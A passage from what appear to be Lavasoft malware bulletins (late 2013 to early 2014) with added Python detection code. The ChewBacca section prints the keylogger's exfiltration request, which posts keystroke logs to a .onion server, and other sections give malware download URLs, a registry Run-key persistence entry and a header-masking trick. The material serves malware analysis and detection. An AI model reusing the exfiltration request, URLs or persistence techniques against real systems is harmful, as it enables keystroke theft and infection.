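    {"pid": 3320, "image": r"C:\Windows\SysWOW64\svchost.exe", "bits": 32, "listening": [9050]},
    {"pid": 4100, "image": r"C:\Users\alice\Desktop\Tor\tor.exe", "bits": 32, "listening": [9050]},
]

if __name__ == "__main__":
    for path, onion in find_hidden_services(SAMPLE_FILES):
        print("hidden service:", onion, "in", path)
    print("svchost.exe listening on 9050, PIDs:", find_rogue_tor_listeners(SAMPLE_PROCESSES))
```

The hostname file is the more valuable find: it gives the hidden-service address the infected machine is reachable at, which can be matched against other hosts' artefacts, while the listener check identifies which process to acquire memory from.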

5. Tor-based Malware

The Tor network has recently been used with increasing frequency to disguise backdoor communication with C&C servers. In 2013 Lavasoft MAS detected and analysed 409 malware samples that use a Tor client to communicate with their C&C, Zeus among them.

We will describe how the Tor network serves the needs of the Trojan named “ChewBacca”, recently mentioned on the Kaspersky blog.

The administration console carries an image of Chewbacca:

ChewBacca is a basic keylogger that uses the Tor network to send keystroke logs to a remote server.

Once executed, it copies itself to the “Startup” folder. Every 15 minutes it checks whether it has been running for at least 24 hours and, if so, sends its log to the attacker.

The backdoor installs a hook on keyboard events:

The keystrokes are stored in the “%Temp%\system.log” file:

Once a day, ChewBacca sends the logged information to the C&C server. The backdoor prepares an HTTP POST for the Tor client to deliver:

POST /sendlog.php HTTP/1.0
Host: 5ji235jysrvwfgmb.onion
Keep-Alive: 300
Connection: keep-alive
User-Agent: ChewBacca/V1
Content-Type: multipart/form-data; boundary=463F8555_Synapse_boundary
Content-Length: 1605
--463F8555_Synapse_boundary
content-disposition: form-data; name="logfile"; filename="00_0C_29_E4_30_EA"
Content-Type: Application/octet-string

[2013-12-19 17:54:20.062 Debug] this typed text can be stolen by the keylogger

--463F8555_Synapse_boundary--

The data is then delivered anonymously through the Tor network, which makes the attacker’s server very hard to trace:
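The POST above contains everything a network analyst needs to write a detection: a .onion Host header, a custom User-Agent, a multipart boundary and a log file named after what appears to be the victim's MAC address. The following is an added example, not code from the bulletin or from the malware: it rebuilds the capture as a constructed byte string (the log body is shortened, so the original Content-Length of 1605 no longer matches it), parses the request and the multipart body by hand, and scores the indicators. Treating the "_Synapse_boundary" string as a hint that the client was built on the Synapse networking library is an inference, not something the bulletin states.

```python
import re

BOUNDARY = b"463F8555_Synapse_boundary"

# Constructed reproduction of the capture shown above (CRLF line endings), not a live sample.
CHEWBACCA_POST = b"\r\n".join([
    b"POST /sendlog.php HTTP/1.0",
    b"Host: 5ji235jysrvwfgmb.onion",
    b"Keep-Alive: 300",
    b"Connection: keep-alive",
    b"User-Agent: ChewBacca/V1",
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY,
    b"Content-Length: 1605",
    b"",
    b"--" + BOUNDARY,
    b'content-disposition: form-data; name="logfile"; filename="00_0C_29_E4_30_EA"',
    b"Content-Type: Application/octet-string",
    b"",
    b"[2013-12-19 17:54:20.062 Debug] this typed text can be stolen by the keylogger",
    b"",
    b"--" + BOUNDARY + b"--",
    b"",
])

ONION_HOST = re.compile(r"^[a-z2-7]{16}\.onion$", re.I)          # v2 hidden-service name
MAC_FILENAME = re.compile(r"^[0-9A-F]{2}(?:_[0-9A-F]{2}){5}$", re.I)  # 00_0C_29_E4_30_EA style
PARAM = re.compile(r'(\w+)="([^"]*)"')


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str):
    """Minimal multipart/form-data splitter; returns one dict per part."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):           # the CRLF before the next delimiter belongs to it
            data = data[:-2]
        fields = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            fields[name.strip().lower()] = value.strip()
        disposition = dict(PARAM.findall(fields.get("content-disposition", "")))
        parts.append({"name": disposition.get("name"),
                      "filename": disposition.get("filename"),
                      "content_type": fields.get("content-type"),
                      "data": data})
    return parts


def analyze_chewbacca_post(raw: bytes) -> dict:
    """Extract the victim identifier and keystrokes and score the protocol indicators."""
    method, path, headers, body = parse_request(raw)
    m = re.search(r'boundary="?([^";\s]+)', headers.get("content-type", ""))
    boundary = m.group(1) if m else None
    parts = parse_multipart(body, boundary) if boundary else []
    logfile = next((p for p in parts if p["name"] == "logfile"), None)
    indicators = {
        "onion_host": bool(ONION_HOST.match(headers.get("host", ""))),
        "chewbacca_ua": headers.get("user-agent", "").startswith("ChewBacca/"),
        "synapse_boundary": boundary is not None and boundary.endswith("_Synapse_boundary"),
        "mac_named_log": bool(logfile and MAC_FILENAME.match(logfile["filename"] or "")),
        "sendlog_path": method == "POST" and path == "/sendlog.php",
    }
    return {
        "host": headers.get("host"),
        "victim_id": logfile["filename"] if logfile else None,
        "keystrokes": logfile["data"].decode("latin-1") if logfile else "",
        "indicators": indicators,
        "score": sum(indicators.values()),
    }


if __name__ == "__main__":
    print(analyze_chewbacca_post(CHEWBACCA_POST))
```

Because the traffic travels inside Tor, this parser only sees plaintext where the client is proxied through an inspecting gateway or the local Tor client is instrumented; the cheaper network signal is the Tor connection itself, plus the fact that a host with no business talking to .onion addresses is doing so on a 24-hour cadence.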

6. 0-Day Exploits

In the November Security Bulletin we analysed an attack exploiting the 0-day vulnerability CVE-2013-3906, which Microsoft publicised on November 5 after a targeted, localised attack on Pakistani machines on 22 October.

On December 10 Microsoft released a security patch fixing the vulnerability in the GDI+ component, which was being exploited through a specially crafted TIFF image.

The scheme of the attack is shown below:

An interesting point is that the attack used a legitimate Google application (GoogleTool.exe) to run the malicious “goopdate.dll” (a library of the same name is used by the Google Update application). After the dropped “Noew.SAM” file was decoded, the DarkShell backdoor was installed on the victim’s computer.
Because the vulnerability remained unpatched for a month after its discovery, CVE-2013-3906 exploits delivered in DOCX files became very popular. We recommend installing the patch from Microsoft (http://technet.microsoft.com/en-us/security/bulletin/ms13-dec) and running Ad-Aware antivirus to protect against such attacks.

7. Bot Review

Table: Bots under analysis (* 1 Mar - 21 Dec 2013, Source: Lavasoft MAS).


Bot's name | 2013* | %
Zbot | 3316 | 41.0%
Cycbot | 338 | 4.2%
Kelihos | 2591 | 32.0%
NrgBot/Dorkbot | 1517 | 18.7%
Blazebot | 12 | 0.1%
Shiz | 317 | 3.9%
Total | 8091 | 100%



Bot distribution in 2013*:

During 2013 we noticed the following peculiarities in bot behaviour:

• Using .EU domains to download malicious binaries (Zbot, Shiz).

• Using Dropbox to download potentially unwanted tools (e.g. Bitcoin miners) and malware (e.g. the Shakblades worm): 121 malicious files were found. The malicious files are, however, quickly deleted or blocked, possibly because of the high number of bot requests.

• The DGA used by Shiz allows AV companies to sinkhole bot traffic.

• Despite numerous takedowns, the Kelihos botnet continues to operate. We wrote about the backdoor modifications and C&C servers used in March and August.

Recently the backdoor started randomising file names and registry keys during installation, and it keeps changing the names of the files it downloads. New names seen in December are: yanicha.exe, sheler1.exe, kecik01.exe, MIA2013.exe.

• As mentioned earlier, the Zbot (Zeus) backdoor can now run under 64-bit Windows (see “64-bit Malware”).

• Bots started using the Tor network for anonymous communication with C&C servers (see “Tor-Based Malware”).

• In July we noticed that the IRC bots NrgBot, Blazebot and Rbot can work in tandem, infecting the same computer at the same time.

You can always find descriptions for the latest backdoors in the Malware Encyclopedia.

8. Statistics 2013

Top20 Blocked Malware - December 2013

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 38.57% | +0.09%
2 | Trojan.Win32.Generic!BT | 28.18% | +0.07%
3 | Malware.JS.Generic | 0.29% | +0.10%
4 | Virus.Win32.Sality.at | 0.27% | +0.10%
5 | Trojan.Win32.Generic!SB.0 | 0.26% | 0.00%
6 | Email-Worm.Win32.Waledac.Gen | 0.19% | new
7 | Trojan.Win32.Generic.pak!cobra | 0.17% | -0.09%
8 | Trojan.Win32.Ramnit.c | 0.17% | +0.02%
9 | Virus.VBS.Ramnit.a | 0.15% | +0.03%
10 | Backdoor.Win32.Spammy.gf | 0.14% | new
11 | Win32.Parite.b | 0.14% | new
12 | Virus.Win32.Ramnit.a | 0.12% | +0.07%
13 | Worm.LNK.Jenxcus.aha | 0.11% | +0.07%
14 | HackTool.Win32.Keygen | 0.11% | 0.00%
15 | Virus.Win32.Virut.a | 0.10% | new
16 | Virus.Win32.Sality.ah | 0.08% | -0.06%
17 | Trojan.Win64.ZAccess.a | 0.06% | new
18 | Exploit.LNK.CaphLnk.b | 0.05% | new
19 | Virus.Win32.Ramnit.b | 0.04% | -0.06%
20 | Worm.Win32.Katar.a | 0.04% | new

The Top 20 malicious programs blocked on PCs

Top20 Blocked Malware in 2013

Position | Ad-Aware detection | % of all threats
1 | Win32.Trojan.Agent | 34.14%
2 | Trojan.Win32.Generic!BT | 25.43%
3 | Trojan.Win32.Generic.pak!cobra | 0.89%
4 | Malware.JS.Generic | 0.71%
5 | Trojan.Win32.Ramnit.c | 0.45%
6 | Trojan.Win32.Generic!SB.0 | 0.44%
7 | Virus.Win32.Sality.ah | 0.42%
8 | Virus.VBS.Ramnit.a | 0.39%
9 | Virus.Win32.Sality.at | 0.32%
10 | HackTool.Win32.Keygen | 0.32%
11 | Virus.Win32.Ramnit.b | 0.27%
12 | Email-Worm.Win32.Brontok.a | 0.24%
13 | Virus.Win32.Ramnit.a | 0.23%
14 | Virus.Win32.Virut.a | 0.22%
15 | Trojan-Clicker.HTML.Iframe | 0.19%
16 | Exploit.LNK.CVE-2010-2568 | 0.18%
17 | Trojan.Win32.Jpgiframe | 0.18%
18 | Trojan.Win32.Reveton.a | 0.15%
19 | Win32.Parite.b | 0.13%
20 | Exploit.AdobeReader.gen | 0.13%

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - December 2013

The table below ranks the most prevalent families seen in December.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 35.82% | +1.43%
2 | Trojan.Win32.Generic.pak!cobra | 7.39% | -0.41%
3 | Trojan-Downloader.Win32.LoadMoney.u | 7.17% | -0.85%
4 | Virus.Win32.Expiro.gen | 6.28% | +1.13%
5 | Virus.Win32.Virut.ce | 2.98% | -3.87%
6 | Worm.Win32.Gamarue.z | 2.81% | -0.98%
7 | Trojan.Win32.Generic!SB.0 | 1.77% | -0.14%
8 | Malware.JS.Generic | 1.38% | -1.34%
9 | Trojan.Win32.Loadmoney.ad | 1.11% | new
10 | Trojan.Win32.Kryptik.bnre | 1.02% | -0.21%
11 | Trojan.Win32.Ircbot!cobra | 0.97% | +0.53%
12 | FraudTool.Win32.FakeRean | 0.86% | +0.25%
13 | TrojanPWS.Win32.OnLineGames.ahj | 0.78% | +0.29%
14 | Worm.Win32.Gamarue.af | 0.60% | new
15 | Trojan.Win32.Kryptik.acsn | 0.55% | -0.19%
16 | Trojan.Win32.Desini.a | 0.53% | +0.07%
17 | Trojan.Win32.DotNet.c | 0.50% | +0.08%
18 | Win32.Malware!Drop | 0.39% | -0.13%
19 | Trojan.JS.Obfuscator.aa | 0.36% | -0.11%
20 | Trojan-Dropper.Win32.Gepys.b | 0.36% | new

New malicious programs entered the Top 20

Malware Prevalence Table in 2013

Position | Ad-Aware detection | % of all threats
1 | Trojan.Win32.Generic!BT | 31.24%
2 | Trojan.Win32.Generic.pak!cobra | 5.17%
3 | Virus.Win32.Expiro.gen | 4.97%
4 | Virus.Win32.Virut.ce | 4.20%
5 | Trojan-Downloader.Win32.LoadMoney.u | 2.47%
6 | Trojan.Win32.Medfos.m | 2.32%
7 | Trojan.Win32.Generic!SB.0 | 1.42%
8 | Malware.JS.Generic | 1.08%
9 | Trojan.Win32.Dwnldr.y | 0.84%
10 | FraudTool.Win32.FakeRean | 0.76%
11 | Worm.Win32.Mabezat.b | 0.71%
12 | Trojan.Win32.Ircbot!cobra | 0.63%
13 | Trojan.Win32.Vobfus.paa | 0.56%
14 | Trojan-Dropper.Win32.Gepys.a | 0.39%
15 | TrojanPWS.Win32.OnLineGames.ahj | 0.36%
16 | Trojan.Win32.Kryptik.acsn | 0.34%
17 | Win32.Malware!Drop | 0.31%
18 | Trojan.JS.Obfuscator.aa | 0.22%
19 | Virus.Win32.PatchLoad.d | 0.19%
20 | Trojan.Win32.Qhosts.bf | 0.18%

New malicious programs entered the Top 20

Top20 Potentially Unwanted Programs - December 2013

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 30.88% | +0.15%
2 | MyWebSearch | 15.54% | +2.95%
3 | Adware.JS.Conduit | 13.87% | -1.13%
4 | Win32.PUP.Bandoo | 6.41% | +1.24%
5 | Adware.Linkury | 5.00% | +0.07%
6 | Adware.DealPly | 2.83% | -0.01%
7 | Win32.Toolbar.Iminent | 2.64% | +0.01%
8 | Crossrider | 1.39% | +0.06%
9 | InstallCore | 1.23% | +0.24%
10 | SweetIM | 1.18% | -0.10%
11 | RelevantKnowledge | 1.14% | new
12 | Besttoolbars | 1.07% | new
13 | Iminent | 1.00% | -1.63%
14 | Opencandy | 0.91% | +0.01%
15 | Babylon | 0.69% | -0.07%
16 | InstallCore.b | 0.66% | +0.20%
17 | Win32.Toolbar.Mediabar | 0.65% | new
18 | Wajam | 0.62% | +0.18%
19 | Yontoo | 0.57% | -0.15%
20 | Amonetize | 0.53% | new

Top20 PUPs detected on user’s PC

Top20 Potentially Unwanted Programs in 2013

Position | Ad-Aware detection | % of all threats
1 | Conduit | 27.36%
2 | MyWebSearch | 16.92%
3 | Adware.JS.Conduit | 13.77%
4 | Win32.PUP.Bandoo | 6.25%
5 | Adware.Linkury | 6.02%
6 | Win32.Toolbar.Iminent | 4.61%
7 | SweetIM | 1.60%
8 | Iminent | 1.58%
9 | Babylon | 1.53%
10 | Adware.DealPly | 1.10%
11 | Crossrider | 1.09%
12 | InstallCore | 1.05%
13 | Yontoo | 0.99%
14 | InstallBrain | 0.97%
15 | Bprotector | 0.79%
16 | Win32.Adware.ShopAtHome | 0.64%
17 | DownloadMR | 0.61%
18 | Wajam | 0.59%
19 | Yontoo | 0.57%
20 | DomaIQ | 0.53%

Top20 PUPs detected on user’s PC

Operating Systems - December 2013

Operating Systems During 2013

Geography of Infections During 2013

The malware distribution shows that the United States contributes the most malware samples. This is to be expected, however, given the number of Lavasoft customers in North America.

Infections by country of origin

9. Forecast for 2014

We are expecting the following threats and attacks in 2014:
1) The Tor network will be used by botnets for anonymous communication with C&C servers, as the new Zeus variants introduced this year have shown.

2) More 64-bit backdoors will appear next year, following the Zeus example. Zbot (the Zeus bot) is currently used to test innovations, and other bots copy the new features once they have passed the verification stage.

3) Botnets will continue using public file-sharing services like Dropbox to download malware and PUPs.

4) Ransomware posing as messages from the FBI or the police will accuse “guilty” users of downloading “prohibited content” and block their computers until the victims pay so-called “administrative fees”. Bitcoin will be used to pay the ransom.

5) Cryptolockers will continue to encrypt personal data with strong ciphers and sell decryption tools to their victims.

6) Bitcoin is on the rise, so we can expect an increase in malware that installs Bitcoin miners on victims’ computers. The focus may well shift to stealing Bitcoin wallets rather than generating new BTC, as mining is becoming harder and harder. Bitcoin banking services will be attractive targets, judging by the numerous successful attacks in 2012/2013; we expect new attacks on them (see “Bitcoin Games”).

7) Android malware will continue to rise in 2014, with attacks on mobile banking applications exploiting new vulnerabilities in the Android OS (e.g. the Svpeng Trojan).

The main trend we foresee is that cyber criminals will increasingly hide their activity inside the anonymous Tor network. In such cases neither C&C servers nor ordinary bots are traceable: researchers cannot find the geographical location of the botnet computers and shut them down. The pseudo-top-level domain “.onion” used in the Tor network to locate a host (e.g. b742crfibawhnims.onion) is not an ordinary DNS name and is not resolved by the public DNS root servers. This addressing mechanism therefore makes it much harder to trace a C&C server or a zombie computer, or to take down a whole botnet inside the Tor network.

Another main focus is the use of the anonymous Bitcoin currency for payments and cyber-theft: Bitcoins are easily stolen and, since no personal information is attached to them, victims cannot prove they owned particular coins before being robbed. Inexperienced Bitcoin owners can easily be scammed by fake or dubious Bitcoin banking services, which may be run by criminals. Users should make certain that any Bitcoin banking service they use is run by a legitimate operator.

Lavasoft Security Bulletin: January 2014

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats
1 | Win32.Trojan.Agent | 80.10%
2 | Trojan.Win32.Generic!BT | 8.10%
3 | Malware.JS.Generic | 3.34%
4 | Heur.HTML.FakeLiker | 0.96%
5 | Virus.VBS.Ramnit.a | 0.66%
6 | Email-Worm.Win32.Brontok.a | 0.62%
7 | Trojan.Win32.Generic.pak!cobra | 0.47%
8 | Trojan-Downloader.Win32.Agent.ckhe | 0.29%
9 | Trojan.Win32.Generic!SB.0 | 0.26%
10 | Worm.LNK.Jenxcus.aha | 0.26%
11 | Virus.Win32.Sality.at | 0.23%
12 | HackTool.Win32.Keygen | 0.23%
13 | Trojan.Win32.Zbot.aba | 0.19%
14 | FraudTool.Win32.InternetProtection.ek!a | 0.19%
15 | Trojan.Win32.Jpgiframe | 0.19%
16 | Virus.Win32.Sality.ah | 0.15%
17 | Worm.Win32.Autorun.ftc | 0.15%
18 | Trojan.Win32.Ramnit.c | 0.14%
19 | Backdoor.Win32.Bifrose.fsi | 0.10%
20 | Win32.Backdoor.Inject/C | 0.09%

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - January 2014

The table below ranks the most prevalent families seen in January.

Position | Ad-Aware detection | % of all threats
1 | Trojan.Win32.Generic!BT | 35.97%
2 | Trojan-Downloader.Win32.LoadMoney.u | 12.95%
3 | Virus.Win32.Virut.ce | 7.41%
4 | Virus.Win32.Expiro.gen | 5.29%
5 | Trojan.Win32.Ircbot!cobra | 3.67%
6 | Trojan.Win32.Generic.pak!cobra | 1.48%
7 | Trojan.HTML.Ransomware.b | 0.87%
8 | Trojan.Win32.Generic!SB.0 | 0.76%
9 | Trojan.Win32.Loadmoney.aa | 0.57%
10 | Trojan.Win32.DelfInject.m | 0.30%
11 | Trojan.Win32.Zbot.aba | 0.29%
12 | Win32.Malware!Drop | 0.27%
13 | Malware.JS.Generic | 0.25%
14 | Trojan.Win32.DotNet.c | 0.25%
15 | Trojan.Win32.ZAccess.ma | 0.24%
16 | Trojan-Downloader.Win32.Wauchos.la | 0.23%
17 | Trojan.Win32.Autorun.dm | 0.23%
18 | Trojan.MSIL.Bladabindi.agxy | 0.19%
19 | Trojan-Spy.Win32.Usteal.da | 0.19%
20 | FraudTool.Win32.FakeRean | 0.06%

New malicious programs entering the Top 20

A new fake-AV interface named ‘Windows Diagnosis’ was discovered in the wild in January. It falsely claims that the user’s computer has security problems, which can supposedly be fixed with paid technical support. It is detected by Ad-Aware as Adware.Generic.647515.

Fake AV (MD5: 342d20129481c90298dcb722c1f68c6c) is detected by Ad-Aware as Adware.Generic.647515

Bots Review

Table: Bots under analysis (January 2014, Lavasoft MAS). The Change column is the month-on-month difference in sample count, expressed as a share of the current month's total.


Bot's name | Dec 2013 | Jan 2014 | Change
Zbot | 499 | 259 | -38.8%
Cycbot | 30 | 17 | -2.1%
Kelihos | 224 | 193 | -5.0%
NrgBot/Dorkbot | 195 | 145 | -8.1%
Blazebot | 0 | 1 | +0.2%
Shiz | 7 | 5 | -0.3%
Total | 955 | 620



Bot distribution in January:

Kelihos

Kelihos download URLs can be easily recognised using the following URL mask:

http://[IP Address]/mod[id]/[file name].exe

For example:

hxxp://123.240.9.110/mod2/tayran1.exe
hxxp://126.117.193.122/mod1/tayran1.exe
hxxp://89.47.95.27/mod1/yanicha.exe

This month the following file names were seen in URLs that download Kelihos updates:

ssk0001.exe, ramps01.exe, tayran1.exe, keybex1.exe, gnomrea.exe

You can find the latest description on Kelihos here.
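The URL mask above is specific enough to hunt for in web-proxy logs. The following is an added example, not code from the bulletin: it turns the mask into a regular expression (a literal IP address, a /mod<number>/ directory and an .exe file name), rejects impossible addresses such as 999.1.1.1, tags file names already listed in this and last month's bulletins, and runs over a few constructed proxy log lines in a "timestamp client method url" layout that is assumed for the example. The log lines are made up; the three Kelihos URLs in them are the ones quoted above.

```python
import re
from ipaddress import ip_address

# URL mask from the bulletin: http://[IP Address]/mod[id]/[file name].exe
# (also accepts the defanged hxxp:// form used in the text)
KELIHOS_URL = re.compile(
    r"^h(?:xx|tt)p://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})/mod(?P<id>\d+)/(?P<file>[A-Za-z0-9_-]+\.exe)$",
    re.I,
)

# File names seen in Kelihos update URLs in December 2013 and January 2014 (from the bulletin).
KNOWN_KELIHOS_FILES = {
    "yanicha.exe", "sheler1.exe", "kecik01.exe", "mia2013.exe",
    "ssk0001.exe", "ramps01.exe", "tayran1.exe", "keybex1.exe", "gnomrea.exe",
}


def match_kelihos_url(url: str):
    """Return the URL's components if it fits the Kelihos mask, else None."""
    m = KELIHOS_URL.match(url.strip())
    if not m:
        return None
    try:
        ip_address(m.group("ip"))          # reject octets above 255
    except ValueError:
        return None
    name = m.group("file")
    return {"ip": m.group("ip"), "mod": int(m.group("id")), "file": name,
            "known_file": name.lower() in KNOWN_KELIHOS_FILES}


# Constructed proxy log lines ("timestamp client method url"), not real logs.
SAMPLE_LOG = """\
1390210000.123 10.0.0.7 GET http://123.240.9.110/mod2/tayran1.exe
1390210001.456 10.0.0.7 GET http://www.example.com/downloads/setup.exe
1390210002.789 10.0.0.9 GET http://89.47.95.27/mod1/yanicha.exe
1390210003.000 10.0.0.9 GET http://126.117.193.122/mod1/tayran1.exe
1390210004.000 10.0.0.3 GET http://10.1.1.5/mod/readme.txt
1390210005.000 10.0.0.3 GET http://999.1.1.1/mod3/evil.exe
"""


def hunt(log_text: str):
    """Return one record per log line whose URL matches the Kelihos mask."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        match = match_kelihos_url(fields[3])
        if match:
            hits.append({"client": fields[1], **match})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

A direct-to-IP download of an executable from a /mod<n>/ directory is rare in legitimate traffic, so even the unknown file names are worth a look; the known-name tag just prioritises the queue.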

Cycbot. You can find the latest description of Cycbot here.
Shiz. The activity of the backdoor is going down. The latest example is here.
Zbot. You can find the latest description of Zbot here.
NrgBot/Dorkbot. The latest description shows that it is capable of running on 64-bit Windows 7, where it starts a 32-bit mspaint.exe process and injects its code into it.

Rbot.
In January, Lavasoft’s Malware Analysis System continued to detect Rbot activity. At the time of writing, the latest version of Rbot still connects to the C&C server "videos.p0rn-lover.us", which sends commands to the IRC bots working in tandem.
The commands sent to IRC bots in January 2014 are:

In addition we discovered a new IRC channel ##USA:

The following files were downloaded by URLs in channels:

ftp://{censored}:{censored}@178.33.232.15:8989/sys.exe

The file is 581182 bytes in size (MD5: 87bdba077896af4cd51a2bfc3d0c080a).

hxxp://www.dropbox.com/s/riiuyej7lza32i3/ms.exe?dl=1

The file is 493122 bytes in size (MD5: 3dd4700eaeecf9d09f2816850d1be03a).

During the month we detected eight successful downloads from Dropbox by Rbot and other malware. Popular file-sharing services are still used by malware despite the security controls put in place by the affected service providers.

Source: grahamcluley.com

SpyEye.
One of the SpyEye actors, Aleksandr Panin, pleaded guilty in Atlanta, US, on 28 January 2014.

The SpyEye trojan, described in the Malware Encyclopedia here and here, was the second most prevalent banking trojan after Zbot (the Zeus backdoor).

Source: bbc.co.uk

In 2011 SpyEye attacked Android devices and became capable of bypassing the two-factor authentication of online banking services.
During the investigation the FBI located a SpyEye C&C server which “contained the full suite of features designed to steal confidential financial information, make fraudulent online banking transactions, install keystroke loggers, and initiate distributed denial of service (or DDoS) attacks from computers infected with malware”. Panin was caught selling new versions of SpyEye on hacker forums; the price of the trojan varied from $1,500 to $8,500.
This was not the first arrest of SpyEye developers: in summer 2012 three cyber criminals were arrested in connection with the SpyEye botnet.

In spring 2013 Hamza Bendelladj of Algeria was also arrested in Thailand and brought to justice in the US for running a SpyEye botnet that stole money from victims’ bank accounts.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats
1 | Conduit | 25.37%
2 | MyWebSearch | 16.02%
3 | Adware.JS.Conduit | 13.45%
4 | Win32.PUP.Bandoo | 7.84%
5 | Adware.Linkury | 5.01%
6 | Adware.DealPly | 2.32%
7 | Adware.Agent | 2.29%
8 | Win32.Toolbar.Iminent | 2.21%
9 | Crossrider | 2.02%
10 | InstallCore | 1.58%
11 | SweetIM | 1.31%
12 | Iminent | 1.10%
13 | Amonetize | 0.98%
14 | Opencandy | 0.90%
15 | Win32.Adware.Agent | 0.88%
16 | CoolMirage Ltd | 0.85%
17 | DomaIQ | 0.84%
18 | Besttoolbars | 0.73%
19 | Babylon | 0.67%
20 | Yontoo | 0.61%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin - February 2014: Under the Dropbox Umbrella

Last month we detected several attempts to download malware using Dropbox as the distribution point. Below are some examples of Dropbox being used for malicious purposes.

1. Rbot/Blazebot (MD5: 9a3490eb3f1e7cc6badde2a680e5975e) downloads and installs a fake instant messenger called “skype.exe” (MD5: cca08446df60bace2fdf019c818edec3), detected by Ad-Aware as Trojan.GenericKD.1523066.
The URL used is:

hxxp://www.v.dropbox.com/s/b5ne62m4z1f3n0e/ms.exe?dl=1

The downloaded application is installed as “skype.exe” in the %Windows% folder.

2. A polymorphic fake AV (MD5: c7c1b6f38f5301526c1636d00826094e, and 27 more copies) connects to Dropbox to download a compressed Adobe Flash Player DLL:

hxxp://dl-balancer.x.dropbox.com/u/69432480/NPSWF32.z

The downloaded file (MD5: 8e2fae29b76ffc2a137859c605ec974d4c1d) contains the compressed Adobe Flash Player 11.1 library NPSWF32.dll (MD5: de3745a51b7ac7fedc356a83f76c8023). The library is dropped only after its first three bytes are patched from “123” back to “MZP”, the DOS-header signature written by the Borland/Delphi linker, so the stored file does not look like an executable until the moment it is written to disk.

3. Another Trojan (MD5: b8402b719d03f467f3b833886810d2e6), detected by Ad-Aware as Trojan.Generic.8048033, downloads and installs a fake Realtek audio driver and also invokes the Adobe Download Assistant.
The URLs used are:

hxxp://dl-balancer.x.dropbox.com/s/qh9jjar5l0zxwu2/unzip.exe?dl=1,
hxxp://dl-balancer.x.dropbox.com/s/f5gcg6shw7we4e6/tools.zip?dl=1

The first file, unzip.exe, is a legitimate utility used to extract the second, tools.zip. Both files are stored in the following folder:

%Documents and Settings%\%current user%\Application Data\Realtek\

The file “reg.reg”, which contains registry settings, is imported with regedit.exe and adds the following Run value to the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HD Audio Driver" = "%WinDir%\explorer.exe %Documents and Settings%\%current user%\Application Data\Realtek\RAVCpl32.exe"

So “RAVCpl32.exe” (a.k.a. “zcontrol.exe”, MD5: 57fdb4c4017dcf4a64824c6ac86ca887), detected by Ad-Aware as Gen:Variant.Symmi.13498, is launched through explorer.exe at every Windows start-up.
Additionally, the malicious downloader uses the legitimate Adobe Download Assistant (ADA) to download and install Adobe AIR from airdownload.adobe.com. The following window is shown to the user while the infection takes place:

It is not clear why the Adobe AIR cross-platform runtime is installed; it may serve to distract the user from the malicious downloads and the fake Realtek audio driver installation.
As we have seen, Dropbox can be used for malicious purposes such as hosting components used by malware. Well-known brand names such as Skype, Realtek and Adobe are used to make the downloads look trustworthy and to hide the infection, making the attacker’s intent hard to spot.
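The three-byte mask on NPSWF32.dll in example 2 is a cheap way to keep a hosted payload from being recognised as a PE file by anything that keys on the "MZ" marker at offset 0. The following is an added example, not code from the bulletin or from the malware: it undoes the mask and then checks that the result carries a plausible DOS header whose e_lfanew points at a "PE\0\0" signature. The bulletin does not say which compression the .z container uses, so the example assumes it receives the already-decompressed bytes, and the sample blob is a constructed minimal header rather than the real library.

```python
import struct

MASKED_PREFIX = b"123"
BORLAND_DOS_MAGIC = b"MZP"   # DOS-header signature emitted by the Borland/Delphi linker


def restore_dos_header(blob: bytes) -> bytes:
    """Undo the 3-byte mask the downloader applies before dropping NPSWF32.dll."""
    if not blob.startswith(MASKED_PREFIX):
        raise ValueError("blob does not start with the expected '123' mask")
    return BORLAND_DOS_MAGIC + blob[len(MASKED_PREFIX):]


def pe_header_offset(blob: bytes):
    """Return e_lfanew if the blob has an MZ header pointing at a PE signature, else None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)   # offset of the PE signature
    if e_lfanew + 4 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return e_lfanew


def is_valid_pe(blob: bytes) -> bool:
    return pe_header_offset(blob) is not None


def build_masked_sample() -> bytes:
    """Constructed stand-in for the decompressed NPSWF32.z payload: a 0x40-byte DOS header
    with e_lfanew = 0x40, followed by a PE signature and an i386 machine field, then masked."""
    dos = bytearray(BORLAND_DOS_MAGIC + b"\0" * 0x3D)      # exactly 0x40 bytes
    struct.pack_into("<I", dos, 0x3C, 0x40)
    pe = b"PE\0\0" + struct.pack("<H", 0x014C)            # IMAGE_FILE_MACHINE_I386
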